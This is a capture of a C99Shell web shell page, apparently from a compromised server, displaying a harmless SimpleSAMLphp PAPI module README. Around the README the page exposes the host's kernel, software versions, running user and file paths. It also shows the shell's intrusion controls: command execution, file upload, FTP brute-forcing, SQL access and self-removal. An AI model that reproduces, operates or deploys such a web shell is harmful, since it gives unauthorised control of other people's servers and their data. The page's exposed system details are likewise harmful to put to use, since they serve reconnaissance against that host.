!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_tdfonline/php/3ros/simplesamlphp/modules/papi/docs/   drwxr-xr-x
Free 13.77 GB of 61.93 GB (22.24%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     papi.txt (1.45 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
PAPI module
===========

The PAPI module provides a single authentication module:

`papi:PAPI`
: Authenticate using the PAPI protocol.

This authentication module makes use of an external library, phpPoA, in order to
authenticate users by means of the PAPI protocol. It can therefore
be used to bridge between protocols, behaving like a PAPI `Point of Access` or
Service Provider.

To use this module, enable it by creating a file named `enable` in the
`modules/papi/` directory. Then you need to add an authentication source which
makes use of the `papi:PAPI` module to the `config/authsources.php` file:

	'example-papi' => array(
		'papi:PAPI',

		/*
		 * The site identifier that allows the module to determine which
		 * configuration of the phpPoA to use.
		 */
		 'site' => 'example',

		 /*
		  * The Home Locator Identifier. Use this if your phpPoA configuration
		  * points to a GPoA instead of an Authentication Server (AS), and you
		  * want to skip the identity provider selection page, by directly
		  * selecting one here.
		  */
		  'hli' => 'exampleAS',
	),

User attributes
---------------

If user attributes were received upon succesful authentication, then their exact
names and values will be transferred into the $state['Attributes'] array. Please
note that attribute name mapping could be needed. There's no support for asking
specific attributes during PAPI authentication. Attributes released to a Service
Provider must be agreed and configured on beforehand.

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.488 ]--